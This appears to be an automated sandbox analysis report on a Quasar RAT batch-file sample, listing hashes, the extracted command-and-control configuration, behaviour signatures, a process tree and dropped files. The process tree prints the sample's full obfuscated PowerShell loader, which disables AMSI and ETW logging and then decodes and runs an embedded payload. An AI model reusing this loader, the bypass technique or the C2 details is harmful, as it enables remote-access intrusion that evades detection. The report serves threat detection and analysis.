Analysis

  • max time kernel
    13s
  • max time network
    22s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win11-20241007-en locale:en-us os:windows11-21h2-x64 system
  • submitted
    25-11-2024 23:43

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

fr

C2

kdotisbetterfr.airdns.org:61875

Mutex

de3f242e-9b27-4bcc-b108-2b89973fa679

Attributes
  • encryption_key

    A9E1D2CBD6699561DDC6C38CE5B7E79D283DC83E

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open-source Remote Access Tool (RAT).

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Uses a powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 
118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + 
(-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2844
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\Admin\AppData\Local\Temp\q3us4qif\CSCE9C3783432E643E58CDDF29BD1A8AEA2.TMP"
          4⤵
            PID:3376

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESA7D9.tmp

      Filesize

      1KB

      MD5

      469e686e9df2e52f7e82ab53ab97fde7

      SHA1

      0ee7ecd82e1ffbd9a168816e99e944979dd8c945

      SHA256

      f1dd5c5fccfdde2df6a3115e515de95e442f5cb62b42f43fb9e64c17a65e1bbf

      SHA512

      df3bbb500722d506989302c091a8f5ea3c3e3dc5be4c53668a097ac6da92c4549a25b3199bfe529d828d649d5ba5bf3c7e705f3daa00beaee43093bfb5107c8f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qqixz41f.ezx.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.dll

      Filesize

      8KB

      MD5

      d455ea2a78e7c692c0576dc34e16d89a

      SHA1

      9cd913ecc8f7722806f0a4b976c6ad643540c67b

      SHA256

      696c26115d19f1626d6aa464e1a5291074350eb8794ea5876125aa91e86e26fe

      SHA512

      e70066ca369f69522bf3751ec20a2ff3c2a1034610a633fb21c0189ec2c393d4a57c515ef5aa65e848d29066f4e44ee14a215b17c644994cd6c46ca8fd51137a

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\CSCE9C3783432E643E58CDDF29BD1A8AEA2.TMP

      Filesize

      652B

      MD5

      01f9d97b36be611ffb3696a03f02d757

      SHA1

      69c658f06bfb9c56199bb5cfad473fb4c4023a35

      SHA256

      d33155bbbcb522bb48e26b46ccbeea4c364dfdb23102241310819ddeb5bfbf91

      SHA512

      33023556438cdec776c3678c2497d239fe1545530adfbe0a70bee40ff066da99c2ca08fb094b6dd2ab3296b4c2abf8d68942b74644f243e0e01327d532a7f362

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.0.cs

      Filesize

      11KB

      MD5

      2baccf8bd40aaee5659a70165d301596

      SHA1

      52f6af554b3df57db81005dd6360f4bc39b93531

      SHA256

      6c6ca5f865d9346cd32d84e0122d1bf08051d8b53c47208cef44bd2bb6133884

      SHA512

      dfbe57879f918c029dc628cc27961d63eca88104e8e7fb3aba8c2d1696419d5010c2dfc7e690669835fa50a0344f1ec5f60f714db95112b18c8524e87d1bb51a

    • \??\c:\Users\Admin\AppData\Local\Temp\q3us4qif\q3us4qif.cmdline

      Filesize

      369B

      MD5

      70a5ad09404150b264f9c75d93bc0397

      SHA1

      41c749907a384353f81d7ddfdf07469ece2040d2

      SHA256

      0b0a627a2d59f32e71e2cbe7a88238db89a5f2dc244fed1ef59adfb06e439eb5

      SHA512

      6dd0801dd732db67c180a22bf19831dff3251484a4fa993db7c77a15e842d06218a8fd3c5989d5c535ef30238c84b3f7ebbabd91f3fdd01f8e75c7a96ab5a3c5

    • memory/848-12-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-28-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-11-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-10-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-6-0x000001AB6E9F0000-0x000001AB6EA12000-memory.dmp

      Filesize

      136KB

    • memory/848-25-0x000001AB6EC00000-0x000001AB6EC08000-memory.dmp

      Filesize

      32KB

    • memory/848-27-0x00007FF93C013000-0x00007FF93C015000-memory.dmp

      Filesize

      8KB

    • memory/848-0-0x00007FF93C013000-0x00007FF93C015000-memory.dmp

      Filesize

      8KB

    • memory/848-29-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-30-0x00007FF93C010000-0x00007FF93CAD2000-memory.dmp

      Filesize

      10.8MB

    • memory/848-31-0x000001AB6EE70000-0x000001AB6F194000-memory.dmp

      Filesize

      3.1MB

    • memory/848-32-0x000001AB6F770000-0x000001AB6F7C0000-memory.dmp

      Filesize

      320KB

    • memory/848-33-0x000001AB6F880000-0x000001AB6F932000-memory.dmp

      Filesize

      712KB

    • memory/848-34-0x000001AB6FB10000-0x000001AB6FCD2000-memory.dmp

      Filesize

      1.8MB